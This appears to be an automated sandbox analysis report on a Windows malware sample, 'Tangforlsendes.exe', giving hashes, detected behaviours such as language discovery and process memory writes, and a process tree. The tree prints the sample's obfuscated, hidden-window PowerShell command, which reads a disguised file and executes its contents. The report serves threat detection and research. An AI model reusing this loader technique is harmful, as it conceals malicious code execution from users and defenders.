Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-01-2025 01:02
Static task
static1
Behavioral task
behavioral1
Sample
Tangforlsendes.exe
Resource
win7-20240903-en
General
-
Target
Tangforlsendes.exe
-
Size
1.5MB
-
MD5
2a3b0c09fb6332a4c35439c0741a3c61
-
SHA1
1de70829cc27202b8b64235fb19829d32ac72ee1
-
SHA256
67e5c1745d2c3382e6f20e2d7cd876acb687f7859aae4cd2b6b9fae6ca5a441e
-
SHA512
901b724023e0ed87ddd483dae7c2c6c2269bb7115f1bfbf87a0b45efd77e20b7bcab183f60b1784ef92d86a6f04e76e719fe2a4d25794304ccc6aebd4bcd7f25
-
SSDEEP
24576:vmwBXOxw33BYQ+0EnWF9gfJmc6Ns2VDdAVjaP+4a8ztxQX8F9toOSZD98+/1c:DXtY0iJ56nVQjaLa8ztisXuRg
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3064 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Tangforlsendes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3064 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1852 wrote to memory of 3064 1852 Tangforlsendes.exe 30 PID 1852 wrote to memory of 3064 1852 Tangforlsendes.exe 30 PID 1852 wrote to memory of 3064 1852 Tangforlsendes.exe 30 PID 1852 wrote to memory of 3064 1852 Tangforlsendes.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tangforlsendes.exe"C:\Users\Admin\AppData\Local\Temp\Tangforlsendes.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Salpiform=gc -Raw 'C:\Users\Admin\AppData\Local\Temp\Liste\Chambrays28\Folkevognsrugbrdene\Basted.Non';$Safianbogbinds=$Salpiform.SubString(36731,3);.$Safianbogbinds($Salpiform)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
-